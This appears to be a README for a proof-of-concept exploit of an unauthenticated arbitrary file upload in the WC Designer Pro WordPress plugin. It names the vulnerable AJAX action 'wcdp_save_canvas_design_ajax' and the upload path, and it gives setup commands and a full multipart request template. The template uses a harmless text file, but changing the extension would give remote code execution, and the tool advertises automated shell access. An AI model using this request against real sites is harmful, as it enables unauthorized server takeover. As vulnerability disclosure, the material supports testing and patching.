
Unauthenticated remote code execution exploit for the WC Designer Pro WordPress plugin. Automates detection, file upload, and shell access via a vulnerable AJAX endpoint.
A non-destructive proof of concept for an unauthenticated arbitrary file-upload vulnerability affecting the WC Designer Pro WordPress plugin.
WC Designer Pro contains an unauthenticated arbitrary file-upload vulnerability in an AJAX action exposed through WordPress's admin-ajax.php endpoint.
The affected handler processes user-controlled file metadata and file contents without enforcing adequate authentication, authorization, extension validation, MIME-type validation, or server-side filename restrictions.
Under vulnerable configurations, an unauthenticated attacker may be able to upload a server-executable file into a web-accessible directory. Successful exploitation may result in remote code execution under the privileges of the web server process.
| Property | Value |
|---|---|
| Product | WC Designer Pro |
| Platform | WordPress |
| Vulnerability class | Unrestricted arbitrary file upload |
| CWE | CWE-434 |
| Authentication required | No |
| User interaction required | No |
| Potential impact | Remote code execution |
| Attack complexity | Low |
| Vulnerable component | WordPress AJAX upload handler |
| AJAX action | wcdp_save_canvas_design_ajax |
The exact affected version range, CVE identifier, and CVSS score must only be published after they have been independently verified.
Successful exploitation could allow an unauthenticated attacker to:
The final impact depends on the web server configuration, PHP execution rules, filesystem permissions, and security controls deployed by the hosting provider.
The affected version range is currently being validated.
Product: WC Designer Pro
Affected versions: To be confirmed
Fixed version: To be confirmed
Patch status: To be confirmed
Do not state that every version is affected unless testing or vendor confirmation supports that conclusion.
The vulnerable upload flow appears to trust attacker-controlled values supplied to the following AJAX action:
wcdp_save_canvas_design_ajax
The request contains file metadata such as:
The vulnerability exists when the server accepts these values without performing all of the following controls:
Unauthenticated request
│
▼
/wp-admin/admin-ajax.php
│
▼
action=wcdp_save_canvas_design_ajax
│
▼
Insufficient validation of uploaded file
│
▼
File written to a web-accessible directory
│
▼
Potential server-side code execution
The observed upload path follows this structure:
/wp-content/uploads/wcdp-uploads/temp/{identifier}/{filename}
The exact path may vary depending on plugin version, WordPress configuration, and server environment.
pipThis proof of concept must not be used against third-party systems without explicit written authorization.
Clone the repository:
git clone https://github.com/m2hcz/wcdp-security-poc.git
cd wcdp-security-poc
Create and activate a virtual environment:
python3 -m venv .venv
source .venv/bin/activate
On Windows:
python -m venv .venv
.venv\Scripts\Activate.ps1
Install the dependencies:
pip install -r requirements.txt
Example requirements.txt:
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0
The proof of concept should be executed only against a single authorized laboratory target.
python3 exploit.py --url https://wordpress-lab.example
For a non-destructive verification:
python3 exploit.py \
--url https://wordpress-lab.example \
--file ./payloads/verification.txt
Example verification file:
WC Designer Pro security verification
Researcher: m2hcz
Purpose: Authorized non-destructive testing
Use the built-in help command to view the supported arguments:
python3 exploit.py --help
Example output:
usage: exploit.py [-h] --url URL [--file FILE] [--timeout SECONDS]
WC Designer Pro arbitrary file-upload verification PoC
options:
-h, --help show this help message and exit
--url URL authorized WordPress target
--file FILE harmless verification file
--timeout SECONDS HTTP request timeout
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress-lab.example
Content-Type: multipart/form-data; boundary=----Boundary
The request invokes:
action=wcdp_save_canvas_design_ajax
A simplified request structure is shown below:
------Boundary
Content-Disposition: form-data; name="action"
wcdp_save_canvas_design_ajax
------Boundary
Content-Disposition: form-data; name="params"
{
"mode": "save",
"editor": "frontend",
"uniq": "research-verification",
"files": [
{
"name": "verification",
"ext": "txt",
"count": "file1"
}
]
}
------Boundary
Content-Disposition: form-data; name="file1"; filename="verification.txt"
Content-Type: text/plain
Authorized security verification
------Boundary--
This example intentionally uses a non-executable text file.